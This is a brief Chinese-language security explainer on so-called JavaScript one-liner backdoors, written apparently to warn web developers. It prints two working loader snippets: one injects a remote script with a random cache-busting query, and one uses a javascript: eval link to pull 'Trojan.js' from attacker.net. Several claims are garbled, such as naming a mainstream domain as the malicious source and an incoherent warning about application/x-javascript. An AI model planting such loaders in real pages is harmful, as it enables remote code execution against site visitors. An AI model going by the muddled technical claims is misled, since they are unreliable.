JavaScript一句話后門（JavaScript One-Liner)是指一種危險的惡意程序代碼，它通常只有一行JavaScript代碼，通過利用Web頁面的漏洞，允許攻擊者遠程執行惡意操作。使用JavaScript一句話后門，攻擊者可以竊取用戶敏感信息、破壞網站功能或者將受害者設備使用為自己的僵尸網絡。就像Python反彈Shell一樣，JavaScript一句話后門也屬于Web安全領域廣泛使用的技巧之一。

示例1：代碼注入一個JS一句話后門

window.onload=function(){
var s=document.createElement('script');
s.type='text/javascript';
s.src='http://www.baidu.com/jquery.min.js?'+Math.random();
document.body.appendChild(s);
}

該示例中，當頁面加載完畢后，將注入新的JavaScript文件，這個文件中包含有使用jquery的一段惡意代碼。由于代碼通常使用好看且不容易引起懷疑的名字命名，并且在每次運行時運用了隨機數，從而增加它的追蹤難度。

示例2：攻擊者通過URL注入一段JS一句話后門

javascript:eval('var s=document.createElement("script");s.type="text/javascript";s.src="http://attacker.net/Trojan.js?'+Math.random()+'";document.body.appendChild(s);');

這個示例是利用JavaScript中的偽協議來匿名注入一段JS代碼，通過它，攻擊者可在不經過用戶同意的情況下獲得對用戶設備的控制權。這也解釋了為什么別人給你發送的一些奇怪的點擊鏈接，你就會感到害怕的原因。

在這里我想特別提醒一下網站開發者在開發過程中不要隨意使用application/x-javascript，在特定的環境中是允許通過訪問控制讓世界上任何人都可以打開你的頁面的！

總之，JavaScript一句話后門是一種危險的Web攻擊技巧。網站開發者必須始終保持警覺，采取各種安全措施來保護自己的站點和用戶。從使用外部開源庫到防御跨站腳本攻擊，所有這些安全措施都至關重要。